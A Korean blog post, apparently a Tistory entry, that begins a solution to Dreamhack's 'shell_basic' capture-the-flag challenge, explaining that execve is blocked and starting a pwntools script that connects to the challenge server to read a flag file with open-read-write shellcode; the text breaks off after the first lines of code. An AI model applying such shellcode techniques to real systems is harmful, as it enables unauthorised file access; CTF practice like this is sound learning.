오랜만에 쓰는 티스토리네요! 오랜만에 와서 새롭게 드림핵 문제 풀이도 도전해보려고 합니다 드림핵 시스템 해킹 로드맵에서 첫 번째 문제인 shell_basic입니다 문제 정보는 이렇고 파일을 다운로드해서 실행해 봅시다! 문제 정보를 보면 execve 시스템 콜을 못한다는 것을 orw 쉘코드를 이용해서 해당 경로에 있는 플래그 파일을 읽는 구조인 인 것 같습니다 원래는 일일이 어셈블리로 쳐줘야 하는데 pwntools이라는 좋은 툴이 있으므로 그걸 사용해 봅시다 from pwn import * p = remote("host3.dreamhack.games", 9801) context.arch = "amd64" r = "/home/shell_basic/flag_name_is_loooooong" shellcode ..
